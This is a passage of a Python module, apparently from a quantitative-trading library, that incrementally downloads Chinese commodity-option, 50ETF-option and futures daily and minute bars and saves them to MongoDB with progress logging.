    err = []  # NOTE(review): duplicate initialisation, redundant — kept as-is

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option M 豆粕 ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option M 豆粕 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — presumably overlaps
                            # the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option M 豆粕 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except:
            # Bare except keeps one failing contract from aborting the pool;
            # the code is recorded and reported at the end.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
    pass
def QA_SU_save_option_commodity_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Save minute bars for every supported commodity-option family.

    Runs the per-family savers one at a time, in the original order
    (CU, SR, M, RU, CF, C).

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    # 测试中发现, 一起回去,容易出现错误,每次获取一个品种后 ,更换服务ip继续获取 ?
    # (observed in testing: fetching everything at once tends to fail, so
    # each commodity family is fetched in its own pass)
    family_savers = (
        _save_option_commodity_cu_min,
        _save_option_commodity_sr_min,
        _save_option_commodity_m_min,
        _save_option_commodity_ru_min,
        _save_option_commodity_cf_min,
        _save_option_commodity_c_min,
    )
    for save_family in family_savers:
        save_family(
            client=client,
            ui_log=ui_log,
            ui_progress=ui_progress
        )
def QA_SU_save_option_50etf_min(client=DATABASE, ui_log=None, ui_progress=None):
    '''Incrementally save 50ETF option minute bars to MongoDB.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    option_contract_list = QA_fetch_get_option_50etf_contract_time_to_market()
    coll_option_min = client.option_day_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []
    # index: code
    err = []  # NOTE(review): duplicate initialisation, redundant — kept as-is

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option 50ETF MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option 50ETF {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — presumably overlaps
                            # the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option 50ETF {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except:
            # Bare except keeps one failing contract from aborting the pool;
            # the code is recorded and reported at the end.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_50etf_day(client=DATABASE, ui_log=None, ui_progress=None):
    '''Incrementally save 50ETF option daily bars to MongoDB.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None; failed contract codes are logged at the end
    '''
    option_contract_list = QA_fetch_get_option_50etf_contract_time_to_market()
    coll_option_day = client.option_day
    coll_option_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []  # contract codes whose download/insert failed
    # index: code

    def __saving_work(code, coll_option_day):
        # Download daily bars for one contract and append only the new rows.
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY==== {}'.format(str(code)),
                ui_log=ui_log
            )
            # First check whether the database already has rows for this code.
            # Option codes are numbered from 10000001 (e.g. up to 10001228).
            ref = coll_option_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # If rows exist, resume incrementally.  The count() guard also
            # avoids a negative index for freshly listed contracts that have
            # no stored rows yet.
            if ref.count() > 0:
                # Continue from the last stored trade date.
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取期权日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    # Fetch strictly after the stored date to avoid duplicates.
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # No stored rows yet: download the full history from scratch.
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            # Record the failing code and continue with the next contract.
            print(error0)
            err.append(str(code))

    # Sequentially process every contract, reporting progress to the UI.
    for item in range(len(option_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(item / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(option_contract_list[item].code, coll_option_day)
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option day ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_contract_list(
        client=DATABASE,
        ui_log=None,
        ui_progress=None):
    '''Fetch the full option contract list and insert the new rows into MongoDB.

    Rows are keyed (and unique-indexed) by their ``desc`` field; a row is
    inserted only when no document with the same ``desc`` exists yet.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    rows_of_option = QA_fetch_get_option_all_contract_time_to_market()
    try:
        # 🛠todo 这个应该是第一个任务 JOB01, 先更新股票列表!!
        QA_util_log_info(
            '##JOB15 Now Saving OPTION_CONTRACT_LIST ====',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=5000
        )
        coll = client.option_contract_list
        coll.create_index([('desc', pymongo.ASCENDING)], unique=True)
        try:
            # DataFrame.from_items was deprecated and removed from pandas;
            # from_dict over an explicit dict is the documented replacement
            # and builds the same contract-per-column frame, which is then
            # transposed to one row per contract.
            df = pd.DataFrame.from_dict(
                dict((s.desc, s) for s in rows_of_option)
            )
            df = df.T
            js = QA_util_to_json_from_pandas(df)
            for a_js_row in js:
                akey = a_js_row['desc']
                # Only insert rows whose 'desc' key is not present yet;
                # insert_one replaces the deprecated Collection.insert.
                if coll.find_one({'desc': akey}) is None:
                    coll.insert_one(a_js_row)
        except pymongo.errors.BulkWriteError as e:
            # Tolerate duplicate-key failures (error code 11000); anything
            # else in the write errors would be a real problem.
            # https://ask.helplib.com/python/post_12740530
            panic = [
                x for x in e.details['writeErrors'] if x['code'] != 11000
            ]
        QA_util_log_info(
            "完成合约列表更新",
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=10000
        )
    except Exception as e:
        QA_util_log_info(e, ui_log=ui_log)
        print(" Error save_tdx.QA_SU_save_option_contract_list exception!")
def QA_SU_save_option_day_all(client=DATABASE,ui_log=None,ui_progress=None):
    '''Incrementally save daily bars for ALL option contracts to MongoDB.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None; failed contract codes are logged at the end
    '''
    option_contract_list = QA_fetch_get_option_all_contract_time_to_market()
    coll_option_day = client.option_day_all
    coll_option_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []  # contract codes whose download/insert failed
    # index: code

    def __saving_work(code, coll_option_day):
        # Download daily bars for one contract and append only the new rows.
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY ALL ==== {}'.format(str(code)),
                ui_log=ui_log
            )
            # First check whether the database already has rows for this code.
            # Option codes are numbered from 10000001 (e.g. up to 10001228).
            ref = coll_option_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # If rows exist, resume incrementally.  The count() guard also
            # avoids a negative index for freshly listed contracts that have
            # no stored rows yet.
            if ref.count() > 0:
                # Continue from the last stored trade date.
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取期权日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    # Fetch strictly after the stored date to avoid duplicates.
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # No stored rows yet: download the full history from scratch.
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            # Record the failing code and continue with the next contract.
            print(error0)
            err.append(str(code))

    # Sequentially process every contract, reporting progress to the UI.
    for item in range(len(option_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(item / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(option_contract_list[item].code, coll_option_day)
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option day all contract ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_min_all(client=DATABASE, ui_log=None, ui_progress=None):
    '''
    Incrementally save minute bars for every option contract
    (all frequencies: 1min/5min/15min/30min/60min) into option_min_all.

    :param client: pymongo database handle (default: DATABASE)
    :param ui_log: GUI (qt) log hook forwarded to QA_util_log_info
    :param ui_progress: GUI (qt) progress hook forwarded to QA_util_log_info
    :return: None
    '''
    option_contract_list = QA_fetch_get_option_all_contract_time_to_market()
    coll_option_min = client.option_min_all
    # composite index on (code, date_stamp) keeps the incremental lookups fast
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    # single error accumulator (the original declared `err = []` twice)
    err = []
    frequencies = ['1min', '5min', '15min', '30min', '60min']

    def __saving_work(code, coll):
        QA_util_log_info(
            '##JOB15 Now Saving Option ALL MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            # `freq` instead of `type` to avoid shadowing the builtin
            for freq in frequencies:
                ref_ = coll.find({'code': str(code)[0:8], 'type': freq})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # resume after the most recent stored bar
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB99.{} Now Saving Option ALL MIN {} from {} to {} =={} '
                        .format(
                            frequencies.index(freq),
                            str(code),
                            start_time,
                            end_time,
                            freq
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            freq
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # drop row 0: it duplicates the last stored bar
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # nothing stored yet: full download from the default start
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB15.{} Now Option ALL MIN {} from {} to {} =={} '
                        .format(
                            frequencies.index(freq),
                            str(code),
                            start_time,
                            end_time,
                            freq
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            freq
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as error0:
            # was a bare `except:`; keep best-effort semantics but surface
            # the failure and stop swallowing e.g. KeyboardInterrupt
            print(error0)
            err.append(code)

    # context manager guarantees the pool is shut down even on error
    with ThreadPoolExecutor(max_workers=4) as executor:
        res = {
            executor.submit(
                __saving_work,
                option_contract_list[i_]["code"],
                coll_option_min
            )
            for i_ in range(len(option_contract_list))
        }  # multi index ./.
        count = 0
        for i_ in concurrent.futures.as_completed(res):
            QA_util_log_info(
                'The {} of Total {}'.format(count,
                                            len(option_contract_list)),
                ui_log=ui_log
            )
            strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
                str(float(count / len(option_contract_list) * 100))[0:4] + '%'
            )
            intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
            QA_util_log_info(
                strLogProgress,
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=intLogProgress
            )
            count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
#######################################################################################
def QA_SU_save_future_list(client=DATABASE, ui_log=None, ui_progress=None):
    '''
    Save the future contract list into the future_list collection.

    :param client: pymongo database handle (default: DATABASE)
    :param ui_log: GUI (qt) log hook (unused here, kept for API symmetry)
    :param ui_progress: GUI (qt) progress hook (unused here)
    :return: None
    '''
    future_list = QA_fetch_get_future_list()
    coll_future_list = client.future_list
    coll_future_list.create_index("code", unique=True)
    try:
        # ordered=False keeps inserting past duplicate-key errors, so a
        # re-run only adds the codes that are not stored yet
        coll_future_list.insert_many(
            QA_util_to_json_from_pandas(future_list),
            ordered=False
        )
    except pymongo.errors.PyMongoError:
        # duplicates (unique index on code) are expected on re-runs;
        # narrowed from a bare `except:` so non-DB errors still surface
        pass
def QA_SU_save_index_list(client=DATABASE, ui_log=None, ui_progress=None):
    '''
    Save the index list into the index_list collection.

    :param client: pymongo database handle (default: DATABASE)
    :param ui_log: GUI (qt) log hook (unused here, kept for API symmetry)
    :param ui_progress: GUI (qt) progress hook (unused here)
    :return: None
    '''
    index_list = QA_fetch_get_index_list()
    coll_index_list = client.index_list
    coll_index_list.create_index("code", unique=True)
    try:
        # ordered=False keeps inserting past duplicate-key errors, so a
        # re-run only adds the codes that are not stored yet
        coll_index_list.insert_many(
            QA_util_to_json_from_pandas(index_list),
            ordered=False
        )
    except pymongo.errors.PyMongoError:
        # duplicates (unique index on code) are expected on re-runs;
        # narrowed from a bare `except:` so non-DB errors still surface
        pass
def QA_SU_save_future_day(client=DATABASE, ui_log=None, ui_progress=None):
    '''
    save future_day
    保存日线数据 (only the continuous contracts: code suffix L8 / L9)
    :param client: pymongo database handle (default: DATABASE)
    :param ui_log: 给GUI qt 界面使用
    :param ui_progress: 给GUI qt 界面使用
    :return: None
    '''
    future_list = [
        item for item in QA_fetch_get_future_list().code.unique().tolist()
        if str(item)[-2:] in ['L8',
                              'L9']
    ]
    coll_future_day = client.future_day
    coll_future_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll_future_day):
        try:
            QA_util_log_info(
                '##JOB12 Now Saving Future_DAY==== {}'.format(str(code)),
                ui_log=ui_log  # keyword: consistent with the other savers
            )
            # 首选查找数据库 是否 有 这个代码的数据
            ref = coll_future_day.find({'code': str(code)[0:4]})
            end_date = str(now_time())[0:10]
            # 当前数据库已经包含了这个代码的数据, 继续增量更新
            # 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
            if ref.count() > 0:
                # 接着上次获取的日期继续更新
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_future_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_future_day(
                                str(code),
                                QA_util_get_next_day(start_date),
                                end_date
                            )
                        )
                    )
            # 当前数据库中没有这个代码的数据, 从2001-01-01 开始下载所有的数据
            else:
                start_date = '2001-01-01'
                QA_util_log_info(
                    'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_future_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_future_day(
                                str(code),
                                start_date,
                                end_date
                            )
                        )
                    )
        except Exception as error0:
            print(error0)
            err.append(str(code))

    for item in range(len(future_list)):
        QA_util_log_info('The {} of Total {}'.format(item, len(future_list)))
        # bug fix: ui_log used to be format()-ed into the progress string
        strProgressToLog = 'DOWNLOAD PROGRESS {}'.format(
            str(float(item / len(future_list) * 100))[0:4] + '%'
        )
        # NOTE(review): the minute savers scale this by 10000 — confirm the
        # expected range of ui_progress_int_value before unifying
        intProgressToLog = int(float(item / len(future_list) * 100))
        QA_util_log_info(
            strProgressToLog,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgressToLog
        )
        __saving_work(future_list[item], coll_future_day)
    if len(err) < 1:
        QA_util_log_info('SUCCESS save future day ^_^', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_future_day_all(client=DATABASE, ui_log=None, ui_progress=None):
    '''
    save future_day_all
    保存日线数据(全部, 包含单月合约)
    :param client: pymongo database handle (default: DATABASE)
    :param ui_log: 给GUI qt 界面使用
    :param ui_progress: 给GUI qt 界面使用
    :return: None
    '''
    future_list = QA_fetch_get_future_list().code.unique().tolist()
    coll_future_day = client.future_day
    coll_future_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll_future_day):
        try:
            QA_util_log_info(
                '##JOB12 Now Saving Future_DAY==== {}'.format(str(code)),
                ui_log=ui_log  # keyword: consistent with the other savers
            )
            # 首选查找数据库 是否 有 这个代码的数据
            ref = coll_future_day.find({'code': str(code)[0:6]})
            end_date = str(now_time())[0:10]
            # 当前数据库已经包含了这个代码的数据, 继续增量更新
            # 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
            if ref.count() > 0:
                # 接着上次获取的日期继续更新
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_future_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_future_day(
                                str(code),
                                QA_util_get_next_day(start_date),
                                end_date
                            )
                        )
                    )
            # 当前数据库中没有这个代码的数据, 从2001-01-01 开始下载所有的数据
            else:
                start_date = '2001-01-01'
                QA_util_log_info(
                    'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_future_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_future_day(
                                str(code),
                                start_date,
                                end_date
                            )
                        )
                    )
        except Exception as error0:
            print(error0)
            err.append(str(code))

    for item in range(len(future_list)):
        QA_util_log_info('The {} of Total {}'.format(item, len(future_list)))
        # bug fix: ui_log used to be format()-ed into the progress string
        strProgressToLog = 'DOWNLOAD PROGRESS {}'.format(
            str(float(item / len(future_list) * 100))[0:4] + '%'
        )
        # NOTE(review): the minute savers scale this by 10000 — confirm the
        # expected range of ui_progress_int_value before unifying
        intProgressToLog = int(float(item / len(future_list) * 100))
        QA_util_log_info(
            strProgressToLog,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgressToLog
        )
        __saving_work(future_list[item], coll_future_day)
    if len(err) < 1:
        QA_util_log_info('SUCCESS save future day ^_^', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_future_min(client=DATABASE, ui_log=None, ui_progress=None):
    """save future_min

    Incrementally save minute bars for the continuous future contracts
    (code suffix L8 / L9) at every frequency (1/5/15/30/60 min).

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- GUI (qt) log hook forwarded to QA_util_log_info
        ui_progress -- GUI (qt) progress hook forwarded to QA_util_log_info
    """
    future_list = [
        item for item in QA_fetch_get_future_list().code.unique().tolist()
        if str(item)[-2:] in ['L8',
                              'L9']
    ]
    coll = client.future_min
    # composite index so incremental queries by code/time stay fast
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    err = []
    frequencies = ['1min', '5min', '15min', '30min', '60min']

    def __saving_work(code, coll):
        QA_util_log_info(
            '##JOB13 Now Saving Future_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            # `freq` instead of `type` to avoid shadowing the builtin
            for freq in frequencies:
                ref_ = coll.find({'code': str(code)[0:6], 'type': freq})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # resume after the most recent stored bar
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Future {} from {} to {} =={} '
                        .format(
                            frequencies.index(freq),
                            str(code),
                            start_time,
                            end_time,
                            freq
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            freq
                        )
                        if len(__data) > 1:
                            # drop row 0: it duplicates the last stored bar
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # nothing stored yet: full download from the default start
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Future {} from {} to {} =={} '
                        .format(
                            frequencies.index(freq),
                            str(code),
                            start_time,
                            end_time,
                            freq
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            freq
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as error0:
            # was a bare `except:`; keep best-effort semantics but surface
            # the failure and stop swallowing e.g. KeyboardInterrupt
            print(error0)
            err.append(code)

    # context manager guarantees the pool is shut down even on error
    with ThreadPoolExecutor(max_workers=4) as executor:
        res = {
